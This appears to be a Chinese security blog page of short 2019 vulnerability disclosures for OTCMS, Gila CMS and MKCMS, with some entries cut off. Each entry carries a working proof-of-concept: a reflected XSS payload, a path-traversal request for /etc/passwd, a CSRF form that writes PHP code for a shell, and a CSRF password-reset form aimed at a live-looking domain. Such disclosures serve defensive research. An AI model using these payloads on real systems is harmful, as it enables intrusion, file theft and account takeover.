博文

OTCMS 反射型XSS漏洞

图片
一、漏洞摘要 漏洞名称: OTCMS 反射型XSS漏洞 上报日期: 2019-05-1 漏洞发现者: topsec_lizhongcheng 产品首页: http://otcms.com 版本: V3.81 二、漏洞概述 apiRun.php 在处理mode参数没有进行过滤,直接输出到页面,造成反射型xss漏洞 poc: http://192.168.3.51/OTCMS/apiRun.php?mudi=autoRun&mode=";alert(document.domain);"

Gila CMS 1.10.1 任意文件下载漏洞

图片
一、漏洞摘要 漏洞名称: Gila CMS 1.10.1 任意文件下载漏洞 上报日期: 2019-04-24 漏洞发现者: topsec_lizhongcheng 产品首页:  https://gilacms.com 版本: V1.10.1 二、漏洞概述 普通用户在下载文件时没有对路径进行过滤,导致可以下载系统文件,造成信息泄露 文件: /src/core/classes/db_backup.php poc: http://192.168.1.112/gila-1.10.1/admin/db_backup?download=/etc/passwd

Gila CMS 1.10.1 CSRF 漏洞

图片
一、漏洞摘要 漏洞名称: Gila CMS 1.10.1 CSRF 漏洞 上报日期: 2019-04-22 漏洞发现者: topsec_lizhongcheng 产品首页:  https://gilacms.com 版本: V1.10.1 二、漏洞概述  后台修改文件处没有token验证,导致csrf漏洞的发生,构造对应的exp可导致getshell 文件:/src/core/controllers/fm.php 构造如下代码,保存为html文件并打开,将成功触发漏洞 <html>   <body>   <script>history.pushState('', '', '/')</script>     <form action="http://192.168.3.21/gila-1.10.1/fm/save" method="POST">       <input type="hidden" name="contents" value="&lt;&#63;php&#10;&#47;&#42;&#33;&#10;&#32;&#42;&#32;Gila&#32;CMS&#10;&#32;&#42;&#32;Copyright&#32;2017&#45;19&#32;Vasileios&#32;Zoumpourlis&#10;&#32;&#42;&#32;Licensed&#32;under&#32;BSD&#32;3&#45;Clause&#32;License&#10;&#32;&#42;&#47;&#10;phpinfo&#40;&#41;&#59;&#10;exit&#40;&#41;&#5

MKCMS V5.0存在逻辑漏洞

图片
一、漏洞摘要 漏洞名称: MKCMS V5.0存在逻辑漏洞 上报日期: 2019-04-18 漏洞发现者: topsec_lizhongcheng 产品首页:  https://micool.net/1090.html 软件链接:  https://www.lanzous.com/i2ipcre 版本: V5.0 二、漏洞概述       1.找回密码的处理逻辑存在漏洞,导致可以接管任意账号 : ucenter/ repass.php         $username 通过post请求过来,接着查询数据库是否存在对应的记录;md5加密后(123456)直接插入数据库,最后通过邮件发送给对应的邮箱账号。所以这里重置后,密码    是可知道的,导致可以接管对应账号 三、利用代 码        1. 构造如下 poc.html, 并访问 poc.html,然后用123456密码登录即可 <html>   <body>   <script>history.pushState('', '', '/')</script>     <form action="http://v.micool.top/ucenter/repass.php" method="POST">       <input type="hidden" name="u&#95;name" value="lduo123" />       <input type="hidden" name="u&#95;email" value="admin&#64;gmail&#46;com" />       <input type="submit" value="Submit request" />